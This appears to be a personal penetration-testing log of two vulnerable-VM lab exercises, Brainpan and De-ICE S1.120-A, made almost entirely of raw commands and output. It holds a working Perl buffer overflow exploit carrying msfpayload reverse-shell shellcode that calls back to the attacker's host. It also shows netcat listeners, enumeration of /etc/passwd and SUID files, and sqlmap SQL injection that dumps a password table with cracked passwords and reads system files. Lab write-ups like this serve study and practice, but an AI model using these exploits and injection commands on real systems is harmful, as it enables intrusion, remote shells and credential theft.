wine: Unhandled page fault on write access to 0x00000073 at address 0x42f9eb (thread 0009), starting debugger...
Unhandled exception: page fault on write access to 0x00000073 in 32-bit code (0x0042f9eb).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:0042f9eb ESP:0042f810 EBP:41414141 EFLAGS:00010202(  R- --  I   - - - )
 EAX:ffffffff EBX:7b8a61cc ECX:00000073 EDX:00429501
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  43434343 43434343 43434343 43434343
0x0042f820:  43434343 43434343 43434343 43434343
0x0042f830:  43434343 43434343 43434343 43434343
0x0042f840:  43434343 43434343 43434343 43434343
0x0042f850:  43434343 43434343 43434343 43434343
0x0042f860:  43434343 43434343 43434343 43434343

root@kali:~# msfpayload  windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 C | msfencode -a x86 -b '\x00\x0a\x0d' -t perl

...

root@kali:~# pico buf_ov.pl

root@kali:~# perl buf_ov.pl 127.0.0.1 9999

[get_reply] copied 1003 bytes to buffer
err:seh:setup_exception_record stack overflow 1648 bytes in thread 0009 eip 7bc411a8 esp 00230cc0 stack 0x230000-0x231000-0x430000

root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
[*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)

my $buf =
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

root@kali:~# pico buf_ov2.pl

#!/usr/bin/perl
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}

$nop = "\x90"; # x86 NOP
$baddata = "A" x 524; #  520 "A" characters to $baddata
$baddata .= pack('V', 0x311712F3); #  JMP ESP
$baddata .= $nop x 16;
$baddata .=
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

$socket = IO::Socket::INET->new( # setup TCP socket – $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 – IP Address
PeerPort => "$ARGV[1]" # command line variable 2 – TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";

$socket->recv($sd, 1024); # Receive 1024 bytes data from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket

root@kali:~# nc -l -p 1234

root@kali:~# perl buf_ov2.pl 192.168.56.104 9999

...

id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
pwd
/home/puck
ls
checksrv.sh
web
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash

netstat -nlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      995/brainpan.exe
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      914/python     
udp        0      0 0.0.0.0:19733           0.0.0.0:*                           -              
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -              
udp6       0      0 :::2659                 :::*                                -              
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     SEQPACKET  LISTENING     6957     -                   /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     6769     -                   @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     7573     -                   /var/run/samba/winbindd_privileged/pipe
unix  2      [ ACC ]     STREAM     LISTENING     7572     -                   /tmp/.winbindd/pipe
unix  2      [ ACC ]     STREAM     LISTENING     9488     999/wineserver      socket
unix  2      [ ACC ]     STREAM     LISTENING     7418     -                   /var/run/dbus/system_bus_socket

cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:reynard
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:reynard
floppy:x:25:
tape:x:26:
sudo:x:27:reynard
audio:x:29:
dip:x:30:reynard
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:reynard
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
messagebus:x:104:
fuse:x:105:
mlocate:x:106:
ssh:x:107:
reynard:x:1000:
lpadmin:x:108:reynard
sambashare:x:109:reynard
anansi:x:1001:
puck:x:1002:
winbindd_priv:x:110:

cat checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep brainpan.exe | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
        killall wineserver
        killall winedevice.exe
    fi
    /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
    fi
    cd /home/puck/web
    /usr/bin/python -m SimpleHTTPServer 10000
fi

find / -type f -perm -04000 -ls
525499   64 -rwsr-xr-x   1 root     root        63632 Sep  6  2012 /bin/umount
525495   32 -rwsr-xr-x   1 root     root        31124 Sep  6  2012 /bin/su
525498   88 -rwsr-xr-x   1 root     root        88768 Sep  6  2012 /bin/mount
530420   32 -rwsr-xr-x   1 root     root        30112 Jun 11  2012 /bin/fusermount
525651   40 -rwsr-xr-x   1 root     root        39124 Oct  2  2012 /bin/ping6
525650   36 -rwsr-xr-x   1 root     root        34780 Oct  2  2012 /bin/ping
...
658003  116 -rwsr-xr-x   2 root     root       115140 Feb 27  2013 /usr/bin/sudo
672442   60 -rwsr-xr-x   1 root     root        60344 Jun 18  2012 /usr/bin/mtr
658477   32 -rwsr-xr-x   1 root     root        30936 Sep  6  2012 /usr/bin/newgrp
658673   32 -rwsr-xr-x   1 root     root        31756 Sep  6  2012 /usr/bin/chsh
658003  116 -rwsr-xr-x   2 root     root       115140 Feb 27  2013 /usr/bin/sudoedit
658676   40 -rwsr-xr-x   1 root     root        40300 Sep  6  2012 /usr/bin/chfn
672094   16 -rwsr-xr-x   1 root     root        14020 Oct  2  2012 /usr/bin/traceroute6.iputils
671718   48 -rwsr-sr-x   1 daemon   daemon      46576 Jun 11  2012 /usr/bin/at
675550   16 -rwsr-xr-x   1 root     lpadmin     13672 Dec  4  2012 /usr/bin/lppasswd
658671   44 -rwsr-xr-x   1 root     root        41292 Sep  6  2012 /usr/bin/passwd
658667   60 -rwsr-xr-x   1 root     root        57964 Sep  6  2012 /usr/bin/gpasswd
672668   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Sep  6  2012 /usr/sbin/uuidd
672521  296 -rwsr-xr--   1 root     dip        301944 Sep 26  2012 /usr/sbin/pppd
656771   12 -rwsr-xr-x   1 anansi   anansi       8761 Mar  4  2013 /usr/local/bin/validate
925433  312 -rwsr-xr--   1 root     messagebus   317564 Oct  3  2012 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
925584  244 -rwsr-xr-x   1 root     root       248064 Sep  6  2012 /usr/lib/openssh/ssh-keysign
788361    8 -rwsr-xr-x   1 root     root         5452 Jun 25  2012 /usr/lib/eject/dmcrypt-get-device
657855   12 -rwsr-xr-x   1 root     root         9740 Oct  3  2012 /usr/lib/pt_chown

find / -perm -2 -ls
...

/usr/local/bin/validate
usage /usr/local/bin/validate <input>
/usr/local/bin/validate aaaa
validating input...passed.
/usr/local/bin/validate
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

root@kali:~# nc -l -p 12345 > validate

nc 192.168.56.101 12345 < /usr/local/bin/validate

root@kali:~# ls -al validate
-rw-r--r-- 1 root root 8761 jan   17 11:47 validate
root@kali:~# ./validate
bash: ./validate: Engedély megtagadva
root@kali:~# chmod 744 validate
root@kali:~# ./validate
usage ./validate <input>

I'm not ready yet to solve this task...

2014. január 13., hétfő

De-ICE-S1.120-A

root@kali:~# netdiscover

 Currently scanning: 192.168.70.0/16   |   Screen View: Unique Hosts                                                     

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                           _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.1.120   08:00:27:df:b1:1d    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                

 192.168.56.100  08:00:27:15:a3:c4    01    060   CADMUS COMPUTER SYSTEMS                                                

root@kali:~# unicornscan -mT 192.168.1.120
Main [Error   route.c:76] no route to host for `192.168.1.120/32'
Main exiting cant get interface(s) for target(s) from route table
root@kali:~# ifconfig eth0 192.168.1.121 netmask 255.255.255.0
root@kali:~# unicornscan -mT 192.168.1.120
TCP open                 ftp[   21]        from 192.168.1.120  ttl 64
TCP open                 ssh[   22]        from 192.168.1.120  ttl 64
TCP open                http[   80]        from 192.168.1.120  ttl 64
TCP open               https[  443]        from 192.168.1.120  ttl 64
TCP open               mysql[ 3306]        from 192.168.1.120  ttl 64
root@kali:~# nmap -sV -A 192.168.1.120 -pT:21,22,80,443,3306

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-13 11:23 CET
Nmap scan report for 192.168.1.120
Host is up (0.00038s latency).
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x   2 0        0              40 Jan  2  2011 incoming
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
| ssh-hostkey: 1024 d5:92:37:32:f2:29:49:a1:3e:4f:cf:53:49:30:de:97 (DSA)
|_2048 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e (RSA)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-

20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T08:10:30+00:00
|_Not valid after:  2010-09-30T08:10:30+00:00
|_ssl-date: 2014-01-13T10:23:39+00:00; -1s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_IDEA_128_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:DF:B1:1D (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.1.120

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

root@kali:~# nc 192.168.1.120 21
220 ProFTPD 1.3.2 Server (Primaline FTP Server) [192.168.1.120]
^C

root@kali:~# ssh root@192.168.1.120
The authenticity of host '192.168.1.120 (192.168.1.120)' can't be established.
RSA key fingerprint is 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.120' (RSA) to the list of known hosts.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied (publickey,password,keyboard-interactive).

root@kali:~# nikto -host 192.168.1.120
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2014-01-13 11:27:44 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2014-01-13 11:27:59 (GMT1) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:~# cd /usr/share/dirb

root@kali:/usr/share/dirb# dirb http://192.168.1.120

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Jan 13 11:28:36 2014
URL_BASE: http://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.1.120/ ----
+ http://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)                                                                     

                                  
+ http://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)                                                                 

                                  
+ http://192.168.1.120/index.php (CODE:200|SIZE:1325)                                                                    

                                  
==> DIRECTORY: http://192.168.1.120/phpmyadmin/                                                                          

                                  
==> DIRECTORY: http://192.168.1.120/webalizer/                                                                           

                                  
root@kali:/usr/share/dirb#
nikto -host 192.168.1.120 -port 443
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
                   Ciphers: DHE-RSA-AES256-SHA
                   Issuer:  /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
+ Start Time:         2014-01-13 11:32:18 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.1.120' does not match certificate's CN 'localhost'
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2014-01-13 11:34:35 (GMT1) (137 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb https://192.168.1.120

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Jan 13 11:35:44 2014
URL_BASE: https://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: https://192.168.1.120/ ----
+ https://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)                                                                    

                                  
+ https://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)                                                                

                                  
+ https://192.168.1.120/index.php (CODE:200|SIZE:1325)                                                                   

                                  
==> DIRECTORY: https://192.168.1.120/phpmyadmin/                                                                         

                                  
==> DIRECTORY: https://192.168.1.120/webalizer/                                                                          

index.php

<p><a href=index.php>Home</a> <a href=add_product.php>Add Product</a> <a href=products.php>View Products</a></p>

add_product.php

<form action="insert_products.php" method="POST">

products.php
<form action="products.php" method="GET">

http://192.168.1.120/insert_products.php

product=prod&description=desc&price=1

--
root@kali:/usr/share/dirb# nc 192.168.1.120 3306
F�j Host '192.168.1.121' is not allowed to connect to this MySQL server

http://192.168.1.120/phpmyadmin/setup/

http://192.168.1.120/phpmyadmin/Documentation.htm

phpMyAdmin 3.1.3.1 Documentation

http://192.168.1.120/products.php?id=1

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1"

...
[12:03:02] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8867=8867

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71676e6871,0x4f5255754b6446647646,0x7176646171),NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[12:03:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
[12:03:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'

[*] shutting down at 12:03:24

--dbs

[12:04:45] [INFO] fetching database names
available databases [6]:
[*] cdcol
[*] information_schema
[*] merch
[*] mysql
[*] phpmyadmin
[*] test

Database: cdcol
Table: cds
[3 entries]
+----+------+-----------------------------------+------------------+
| id | jahr | titel                             | interpret        |
+----+------+-----------------------------------+------------------+
| 1  | 1990 | Beauty                            | Ryuichi Sakamoto |
| 4  | 2001 | Goodbye Country (Hello Nightclub) | Groove Armada    |
| 5  | 1997 | Glee                              | Bran Van 3000    |
+----+------+-----------------------------------+------------------+

Database: mysql
Table: user
[50 entries]
+------------+------------------------------------------------------+
| User       | Password                                             |
+------------+------------------------------------------------------+
| aadams     | *90837F291B744BBE86DF95A37D2B2524185DBBF5 (whatever) |
| aallen     | *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9 (nintendo) |
| aard       | *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0 (kotaku)   |
| aharp      | *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 (passw0rd) |
| aheflin    | *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 (654321)   |
| amaynard   | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456)   |
| aspears    | *A5892368AE83685440A1E27D012306B073BDF5B7 (monkey)   |
| aweiland   | *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 (123123)   |
| bbanter    | *CFBF459D9D6057BC2A85477A38327B96F06B1597 (iloveyou) |
| bphillips  | *D6B63C1953E7F096DB307F8AC48C4AD703E57001 (sunshine) |
| bwatkins   | *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E (superman) |
| cchisholm  | *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5 (1234567)  |
| ccoffee    | *2CE4701D02A76C12CD513109CA16967A68B4C23A (princess) |
| dcooper    | *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91 (consumer) |
| dgilfillan | *6691484EA6B50DDDE1926A220DA01FA9E575C18A (abc123)   |
| dgrant     | *7FD9F123C9FC025372A5AAD19D107783CD19CCF7 (cheese)   |
| djohnson   | *FD571203974BA9AFE270FE62151AE967ECA5E0AA (111111)   |
| dstevens   | *B021918A5DCA54916CF724573179571DFC37AC88 (jennifer) |
| dtraylor   | *24B8599BAF46DD4B4D8DB50A3B10136457492622 (starwars) |
| dwestling  | *446525BB82B5E22BD9E525261D37C494F623C52B (blahblah) |
| hlovell    | *DF216F57F1F2066124E1AA5491D995C3CB57E4C2 (welcome)  |
| jalcantar  | *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC (pokemon)  |
| jalvarez   | *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC (666666)   |
| jayala     | *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00 (michael)  |
| jbresnahan | *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594 (Password) |
| jdavenport | *61305383748FBEAB119F9A8BC35EBBADB4889A9D (babyl0n)  |
| jduff      | *46CFC7938B60837F46B610A2D10C248874555C14 (trustno1) |
| jfranklin  | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) |
| kclemons   | *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8 (killer)   |
| krenfro    | *D183105443FBDE597607B8BC5475A9E1B7847F3E (gizmodo)  |
| ktso       | *81101DED975D54BD76A3C8EAD293597AE9BB143F (computer) |
| kwebber    | *79BF466BCC601BD91A0897BB162421F9BA8C29CA (lifehack) |
| lmartinez  | *ED043A01F4583450BC8EB1E83C00C372CA49C4E4 (michelle) |
| lmorales   | *8D6A637F37955DBFCE1229204DDBED1CE11E6F41 (master)   |
| mbryan     | *626AC8265C7D53693CB7478376CE1B4825DFF286 (pepper)   |
| mholland   | *51AA306E66303073DBA15D2750E23C90C7A7F947 (baseball) |
| mnader     | *94F3DC3F398B76269CAAD51627279D4233A6C89A (soccer)   |
| mrodriguez | *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC (jordan)   |
| myajima    | *00A51F3F48415C7D4E8908980D443C29C69B60C9 (12345)    |
| qpowers    | *84AAC12F54AB666ECFC2A83C676908C8BBC381B1 (12345678) |
| rdominguez | *3EEB06BE54EABF909DC8F6107110777F1DE43186 (gawker)   |
| rjacobson  | *797420C584EBF42750EB523104268BA0FD87FBC8 (internet) |
| rpatel     | *B12289EEF8752AD620294A64A37CD586223AB454 (0)        |
| sgains     | *F491287896471CB21030790BF46865C4A39DE651 (batman)   |
| sjohnson   | *FCAAF3F0BD94C027B2769A95903C355CE6294660 (football) |
| strammel   | *F8E113FD51D520075836A4B815568BA2B96F7C30 (dragon)   |
| swarren    | *7B2F14D9BB629E334CD49A1028BD85750F7D3530 (shadow)   |
| tdeleon    | *AA1420F182E88B9E5F874F6FBE7459291E8F4601 (qwerty)   |
| tgoodchap  | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein)  |
| webapp     | *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F            |
+------------+------------------------------------------------------+

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1" --file-read=/etc/passwd

root@kali:~# cat /usr/share/sqlmap/output/192.168.1.120/files/_etc_passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
